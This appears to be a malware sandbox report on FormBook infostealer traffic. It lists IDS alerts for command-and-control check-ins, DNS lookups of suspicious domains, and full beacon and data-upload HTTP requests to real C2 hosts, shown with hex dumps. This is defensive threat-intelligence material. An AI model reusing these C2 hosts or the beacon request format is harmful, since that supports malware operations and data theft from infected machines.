Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49952 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49993 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49931 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50045 -> 154.23.184.141:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50041 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 154.23.184.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50053 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50062 -> 172.67.217.176:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50049 -> 38.47.233.52:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 38.47.233.52:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50063 -> 172.67.217.176:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50033 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50061 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 38.47.233.52:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 162.0.211.143:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50037 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 154.23.184.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 38.47.233.52:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50059 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50065 -> 172.67.217.176:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 154.23.184.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50066 -> 206.119.82.172:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50055 -> 38.55.215.72:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50025 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 162.0.211.143:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 162.0.211.143:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 38.55.215.72:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50057 -> 38.55.215.72:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50029 -> 162.0.211.143:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 38.55.215.72:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50064 -> 172.67.217.176:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50067 -> 206.119.82.172:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50060 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50068 -> 206.119.82.172:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.7nz4.xyz
Source:	DNS query: www.akkushaber.xyz

Source: Joe Sandbox View	IP Address: 206.119.82.172 206.119.82.172
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: VIMRO-AS15189US VIMRO-AS15189US
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49737

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /b1o1/?42T8f=ABwh0lAHdJnXMBd&fZah6=YsBs0CinjQ802jw7BWH43U6yChFfBgTCWtBfXrDog/OSaTn6EFf5NE6XC8wGYTCejLSWH1L1CzOp5Uda5M1yGZHuu6Q/qvkBsiCvvtwaqztjOHxPUPsPREc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.berita-juli2024162.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /aol7/?fZah6=Rxu8Z90G9VWM2dhhwInP5UWvQ8oNZRnGbIBiN2Yx7zo2WUAB2/dtC+DxHmOlvC9JJTkxcfTX/APyKTxCxnQfyKdrjKf6HloyJ1pBHAL5FHO6MnioIGNGXfY=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.innovators.groupUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4w1b/?42T8f=ABwh0lAHdJnXMBd&fZah6=X2GTIolTa1UnBQ8Mt4GmPrXHDjrv0FKKXiYqznC6itjD0Z2FTorZXZ1nTumJudmkhSgQe73MRozJqa0gxwnUHUwni1KndLADF3HY4z2B7/J9VzK4aV2y2BM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ulula.orgUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6yvy/?fZah6=fhdCm7QPgJWPZ057s64Ux5r/+BZivFIion+wLFyamRalFHuL34U2xPSs+rBZlbdbh9uPsXLFfNB9r2rL2d2sjvCbVXN57VFg+LFqSyLQYcizqp2CdTkuIG8=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.havan-oficial.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /eziw/?fZah6=eIA0Jd5aMS2L7DX5fIIZoNagEXcpH0QKyJTSXVeeqMeXfMTLyOlbTsl/2ncp1mdFNMCAwgVL1bSg13wM91y9oVrWsMArp8Gmd60S1VkCFu8W6LIlsIwOfco=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.digitalincomenow.netUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /woqs/?fZah6=wiTqGDnmX/c8wYk1K3U3i02cYFo4f9Rwlcub3NbkYBpLwl8ATlKj09fiWtFQA99a/0iGj4H9zxIjdkaMmIp9HB1ch/llL5XaFQCQlOxZHX37Rc52Pv+iRyU=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.qadlo.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /0s9c/?fZah6=S3rghNbYyRcMPCNqAPl1nBp46vs8gCt4oCoKFWGUUYIGj18qpRc3RQpFXxaxtfL1u/vEqVXnsxI0ESu2OB/aFp2EnULTCH6lqS30MNPC1ACJqrjLawOg2io=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.electronify.shopUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /t9om/?fZah6=n0WfMl5CnLPcYEIDSbX8vA256gGCe+H9L+kKo2v7Vr4MgHUbO89S9QyuVriZ/m6E+Bwct3PaGgmX9ENC/wR4gZ3UutUQij8B41Y6ve4/n9x34EbJwWPEaRw=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.lowerbackpain.siteUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /jpec/?42T8f=ABwh0lAHdJnXMBd&fZah6=H/6EYszByJpADA+WA3Vqt418sGn9uf8tg+SGSp7tj40HLMf8PQbgyfoSnaQ4KyKmnn8a8l03/u5+bfBufpbeP/ygRn3ZetvVjymO339MDPXXlNpwByLpzyY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mythkitchen.netUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cisl/?fZah6=lWbjfgsSROluEJiB130lMvTTODsRzMpi0/0hjnk2IWgqE7GjKRd2WK82uOKTApKAYp80eLoSkDd+9uj5wYnhWREwRAyCHQcyRtiVUe8dDUuRz//M0PaFelw=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.36ded.topUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4loa/?42T8f=ABwh0lAHdJnXMBd&fZah6=SN4PMyo74av9+JlAjXvK/p/EMbnZZTDB5nvebkFF6pc7tGQcTkdQn496kLp0em7XFopoYz6akDPS3Yl+mttD1trTUMnQbHN5WHDpnwWuc7UyUJZMySE4MJ8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.2q33e.topUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /zjtq/?fZah6=Cuuzl5FVgphuAFBESmHRpvP2Veux2vrxQdW4Gde9XtzmimLWUn4Ll1T5MO27eRDtOrOWVppgjVRQMehzsGxVlZovxZP6uR3wLXZLAqFvA+7mOHQos1c683Q=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.figa1digital.servicesUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fmne/?42T8f=ABwh0lAHdJnXMBd&fZah6=KT9ASLL7nshZG3MA1LywRmktUAzm0MonJvohshJAkYyq/X4JJvhRXZaeRtgNm/hpfh3HE8zpNq8ggvV/Ig5z2ZvxJO0/GJu4PVG82LAWI/PjCbr5iIHKPVw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.7nz4.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /x8cs/?fZah6=bj7RC6TSXqG0XZdA36atdanyU4qMo2uf9tu81Jz1rZWpiEIrMua+i+fZ8jkzZnBN7K16BubLDLaDoM8eXU5kjEJcS1M5B544eLAADTP2O+nB8SN15NaKPxM=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.wcp95.topUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /x784/?42T8f=ABwh0lAHdJnXMBd&fZah6=z1xRKJbVI4qWZJYuN3/Y1QlPgxFzBlHz+yp8GvsKYYCXapov62MLDH6IViKuZ3c2V3KnFmbn4PDNDh0fz7SuvPnX+7QhQmDMmkdFhT0O1l19tgipO3DZ86o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.akkushaber.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.berita-juli2024162.sbs
Source: global traffic	DNS traffic detected: DNS query: www.innovators.group
Source: global traffic	DNS traffic detected: DNS query: www.ulula.org
Source: global traffic	DNS traffic detected: DNS query: www.havan-oficial.online
Source: global traffic	DNS traffic detected: DNS query: www.digitalincomenow.net
Source: global traffic	DNS traffic detected: DNS query: www.qadlo.life
Source: global traffic	DNS traffic detected: DNS query: www.electronify.shop
Source: global traffic	DNS traffic detected: DNS query: www.lowerbackpain.site
Source: global traffic	DNS traffic detected: DNS query: www.mythkitchen.net
Source: global traffic	DNS traffic detected: DNS query: www.36ded.top
Source: global traffic	DNS traffic detected: DNS query: www.2q33e.top
Source: global traffic	DNS traffic detected: DNS query: www.figa1digital.services
Source: global traffic	DNS traffic detected: DNS query: www.7nz4.xyz
Source: global traffic	DNS traffic detected: DNS query: www.wcp95.top
Source: global traffic	DNS traffic detected: DNS query: www.akkushaber.xyz
Source: global traffic	DNS traffic detected: DNS query: www.wddb97.top

Source: unknown

HTTP traffic detected: POST /aol7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 202Connection: closeHost: www.innovators.groupOrigin: http://www.innovators.groupReferer: http://www.innovators.group/aol7/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36Data Raw: 66 5a 61 68 36 3d 63 7a 47 63 61 4b 41 64 67 48 58 31 77 4e 38 76 39 71 66 69 32 56 71 67 57 72 6b 51 65 6a 48 36 58 35 39 51 42 6c 45 45 38 69 51 53 62 58 73 7a 37 4a 73 63 44 4f 48 57 47 56 2b 44 76 78 67 6d 47 6c 41 5a 54 2f 54 30 6d 68 62 67 53 51 6b 69 6c 33 6b 77 73 4f 42 73 6e 4e 47 4e 44 58 55 33 45 56 6c 6f 42 51 43 49 50 6e 32 70 50 58 2b 62 50 57 49 50 41 4f 6c 31 74 4e 37 4b 76 6d 2f 4d 49 6f 58 43 58 47 6a 47 43 6e 50 4a 68 48 34 51 6e 42 52 34 39 6a 6b 61 57 6a 64 4b 4d 4e 34 43 77 31 69 32 6e 61 38 63 56 74 71 4d 57 6c 65 6b 72 44 47 54 2f 79 44 66 32 4a 53 77 4d 42 4e 45 51 77 3d 3d Data Ascii: fZah6=czGcaKAdgHX1wN8v9qfi2VqgWrkQejH6X59QBlEE8iQSbXsz7JscDOHWGV+DvxgmGlAZT/T0mhbgSQkil3kwsOBsnNGNDXU3EVloBQCIPn2pPX+bPWIPAOl1tN7Kvm/MIoXCXGjGCnPJhH4QnBR49jkaWjdKMN4Cw1i2na8cVtqMWlekrDGT/yDf2JSwMBNEQw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 11 Nov 2024 05:50:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 39 30 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 05:51:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 